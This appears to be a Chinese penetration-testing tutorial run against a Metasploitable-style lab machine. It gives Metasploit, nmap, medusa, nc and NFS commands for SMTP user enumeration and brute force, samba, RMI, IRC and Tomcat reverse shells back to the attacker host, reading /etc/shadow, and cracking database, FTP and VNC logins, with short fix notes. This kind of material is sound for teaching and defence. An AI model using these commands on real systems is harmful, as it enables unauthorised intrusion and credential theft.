漏洞利用-利用搭建的环境发送邮件
前提：

新建一个用户
sudo adduser test1[出自:jiwo.org]
发送邮件

利用Linux下thunderbird软件进行邮件的发送
命令行输入
thunderbird --打开软件
设置电子邮箱账户
姓名：test1
电子邮件：test1@mail.test.lab
密码：123456
手工配置
pop3 – 110
smtp --25
服务器主机名都设置为本地的IP地址
重新检测
完成
如果跳出无法识别身份认证
选择：确保安全例外
接收邮件

同样是使用thunderbird接收
漏洞利用-枚举smtp用户名
telnet测试用户名
telnet IP地址 端口 --（一般是25端口）
vrfy test@mail.test.lab（这里的用户名需要手工填写）
返回252、250、251表示用户存在
返回550表示用户不存在
Metasploit测试用户名
在metasploit中有smtp-enum可以对smtp上用户名进行枚举
use auxiliary/scanner/smtp/smtp_enum
set rhosts IP地址
set rport 25
set USER_FILE 用户名字典文件路径
run/exploit
smtp-user-enum工具测试用户名
smtp-user-enum专门用来进行smtp用户名枚举的工具（如果没有使用apt-get install smtp-user-enum进行安装）
smtp-user-enum -M VRFY -U 用户名字典文件路径 -t 目标IP地址
ismtp工具测试用户名（apt-get install ismtp）
ismtp -h IP地址:25 -e email字典文件路径
漏洞利用-smtp暴力破解
smtp版本信息获取
使用metasploit中的smtp-version模块探测smtp服务器的版本信息
目标：129.121.22.119
use auxiliary/scanner/smtp/smtp_version
set rhosts 129.121.22.119
run
Medusa工具介绍
一款用来破解不同协议用户名和密码的专用软件
smtp验证方式
参考链接
Medusa破解smtp
medusa -h 目标IP地址 -u 用户名 -P字典文件 -M 协议模块
medusa -h 129.121.22.119 -u test -P 密码字典文件 -M smtp

漏洞利用-rpcbind漏洞利用
rpcbind介绍
通俗来说，rpcbind是NFS中用来进行消息通知的服务
一般情况下rpcbind运行在111端口。并且NFS配置开启rpcbind_enable=“YES”
nmap IP地址（探测端口开放状态）
探测目标rpcbind（使用Mestasploit靶机）
使用nmap -sV -p 111 IP地址 --探测目标rpcbind版本信息
nmap -sV -p 111 192.168.3.16
获得版本信息后可以使用searchsploit工具探测是否具有可利用脚本
searchsploit rpcbind
nmap脚本探测
在nmap中探测目标的rpcinfo信息
nmap -p 111 --script=rpcinfo 192.168.3.16
Mestasploit模块探测
use auxiliary/scanner/misc/sunrpc_portmapper
set rhosts 192.168.3.16
run
漏洞利用-samba RCE远程命令执行漏洞利用
samba介绍
是在Linux和UNIX系统上实现SMB协议的一个免费软件，基于C/S架构。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，为局域网内不同的计算机之间提供文件及打印机等资源的共享服务
一般运行在139、445等端口
探测目标samba
探测目标端口服务版本信息
nmap -sV -p 139,445 IP地址
Metasploit漏洞利用
在Metasploit中集成了利用samba usermap RCE的脚本
use exploit/multi/samba/usermap_script
set rhosts 192.168.3.16
show payloads --查找当前可用的payload
set cmd/unix/reverse
set lhost 192.168.3.8 --这个IP地址是本地kali的IP地址
set lport 4444 --这个端口自己随意设置
run/exploit
执行完成后会拿到一个反弹的shell
防御修复
在Metasploit show info可以查看漏洞信息
use exploit/multi/samba/usermap_script
show info
修复方案：升级samba版本
漏洞利用-rlogin最高权限登录
rlogin介绍
远程登录（rlogin）是一个UNIX命令，允许授权用户进入网络中的其他UNIX机器并且就像用户在现场操作一样。一旦进入主机，用户可以操作主机允许的任何事情
nmap IP地址
探测目标rlogin
探测目标rlogin版本信息
nmap -sV -p 512,513 IP地址
512用于对远程执行的进程进行验证、513反弹bash shell
rlogin最高权限登录
使用最高权限登录系统
rlogin -l root IP地址
防御修复
添加root登录验证密码
关闭rlogin服务，改用ssh等来管理服务器
漏洞利用-反序列化远程命令执行漏洞利用
Java rmi介绍
Java RMI指的是远程方法调用（Remote Method Invocation）。是一种机制，能够让在某个Java虚拟机上的对象调用另一个Java虚拟机中的对象上的方法

探测目标rmi
探测目标的版本信息
nmap -p 1099 -sV IP地址
rmi远程命令执行利用
使用Metasploit对rmi RCE漏洞利用
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.3.16
show paylosds
set payload java/meterpreter/reverse_tcp
set lhost 192.168.3.8
set lport 4444
exploit
sessions -i 1
防御修复
存在反序列化传输 ------特别注意
存在有缺陷的第三方库如commons-collections 及时升级库
漏洞利用-后门连接
后门连接探测

某些情况下，服务器可能存在某些后门。可以使用nmap进行探测

nmap 192.168.3.16 

猜测1524端口服务可能存在bindshell（后门）

nmap -sV -p 1524 192.168.3.16 --探测后门

nc连接后门获取权限

连接后门程序
nc 目标IP 端口号
nc 192.168.3.16 1524
漏洞利用-nfs获取目标密码文件
NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，允许网络中计算机之间通过TCP/IP网络共享资源。在NFS的应用中，本地NFS客户端可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件（2049）
探测目标nfs（通过rpcbind返回）
nmap --script=nfs-* IP地址
探测nfs是否可以导出
使用showmount命令确定"/"共享（文件系统的根）是否正在导出。如果使用不了命令，执行apt-get install nfs-common安装nfs-common包
showmount -e IP地址
返回 /* 表示可以导出目录下所有内容
查看导出内容
新建目录
mkdir nfs_root
导出不加锁
mount -t nfs IP地址:/ ~/nfs_root -o nolock
查看内容
cat ~/nfs_root/etc/shadow
漏洞利用-proftp测试
proftpd介绍
ProFTPD：一个Unix平台上或类Unix平台上（如Linux，FreeBSD等）的FTP服务器程序
官方链接
探测目标
探测目标proftpd版本信息
nmap -sV -p 2121 IP地址
exploit-db搜索目标漏洞
进入网站
链接
输入对应软件及版本搜索是否有漏洞
msf暴力破解密码
use auxiliary/scanner/ftp/ftp_login
set rhosts 192.168.3.16
set username msfadmin
set password msfadmin
set rport 2121
exploit
漏洞利用-mysql弱口令破解
mysql介绍
官网
探测目标mysql
探测目标版本信息
nmap -sV -p 3306 IP地址
msf破解mysql密码
使用mysql_login模块破解mysql登录用户名和密码
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.3.16
set user_file 用户字典文件
set pass_file 密码字典文件
exploit
登录数据库查看数据
无法使用mysql命令
可以安装一下（kali2只支持mariadb了）
apt-get install mariadb-client
apt-get install mariadb-server
mysql -h IP地址 -u root
show databases --查看数据库
use 数据库名
show tables --查看表名
select * from 表名 --查看表数据
漏洞利用-postgresql数据库密码破解
postgresql介绍

以 加州大学 伯克利分校计算机系开发的 POSTGRES， 是一个功能强大的开源对象关系数据库管理系统(ORDBMS) 。PostgreSQL(也称为Post-gress-Q-L)由PostgreSQL全球开发集团(全球志愿者团队)开发。 它不受任何公司或其他私人实体控制。 它是开源的，其源代码是免费提供的。PostgreSQL是跨平台的，可以在许多操作系统上运行
官网
探测目标postgresql

探测目标postgresql版本信息
nmap -sV -p 5432 IP地址
msf暴力破解postgresql

首先可以获取版本信息
use auxiliary/scanner/postgres/postgres_version
run
暴力破解
use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.3.16
run --默认已设置好字典文件
登录postgresql

利用pyadmin客户端软件登陆postgresql（任意可安装的都可以）
漏洞利用-postgresql代码执行利用
postgresql代码执行利用
利用msf下postgresql的代码执行获得反弹shell
use exploit/linux/postgres/postgres_payload
set rhosts 192.168.3.16
run
防御修复
防御：屏蔽任意IP连接postgresql
修复：升级版本，安全配置
漏洞利用-VNC密码破解
vnc介绍
VNC（Virtual Network Console）是虚拟网络控制台的缩写。是一款优秀的远程控制工具软件，由著名的AT&T的欧洲研究实验室开发的。可视化控制，类似于远程桌面，默认vnc服务运行在5900端口
探测目标vnc版本信息
nmap -sV -p 5900 192.168.3.16
msf破解vnc密码
msf下vnc_login模块可用来对vnc服务端认证用户名和密码进行破解
use auxiliary/scanner/vnc/vnc_login
set rhosts 192.168.3.16
run
vnc客户端登陆
windows下安装vnc viewer 客户端软件连接VNC服务端
防御：实时监控，设置复杂密码，安全策略
漏洞利用-IRC后门利用
IRC介绍

IRC是Internet Relay Chat的英文缩写，中文称为互联网中继聊天。由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年发展，目前有超过60个国家提供了IRC的服务。
工作原理：
在自己的PC运行客户端软件，然后通过internet以IRC协议连接到一台IRC服务器上即可。
特点：
速度非常之快，聊天几乎没有延迟的现象，并且只占用很小的带宽资源。
所有的用户可以在一个被称为"Chnnel"（频道）的地方就某一话题进行交谈或密谈。
每个IRC使用者都有一个Nickname（昵称）。
默认IRC服务器运行在6667端口
探测IRC版本信息

nmap -sV -p 6667 IP地址
msf利用IRC后门

使用searchsploit查找可以利用的POC

searchsploit UnrealIRCd --这里的UnrealIRCd是前面探测出的版本信息 
利用msf中对于IRC后门连接的模块，连接shell

use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.3.16
set rport 6667
set payload cmd/unix/reverse
set lhost 192.168.3.8
set lport 4444
修复防御

升级软件版本
更换其他软件
漏洞利用-Tomcat管理密码破解
Tomcat介绍

Tomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。
默认情况下，8180端口是Tomcat管理的HTTP端口
探测目标Tomcat版本信息

nmap -sV -p 8180 IP地址
msf破解Tomcat密码

use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.3.16
set rport 8180
run
msf利用Tomcat管理

使用msf下的exploit/multi/http/tomcat_mgr_deploy模块利用Tomcat upload功能反弹shell
use exploit/tomcat_mgr_deploy
set rhost 192.168.3.16
set rport 8180
set httppassword tomcat --前面爆破出来的密码
set httpusername tomcat --前面爆破出来的用户
run
防御修复

设置阈值和复杂的密码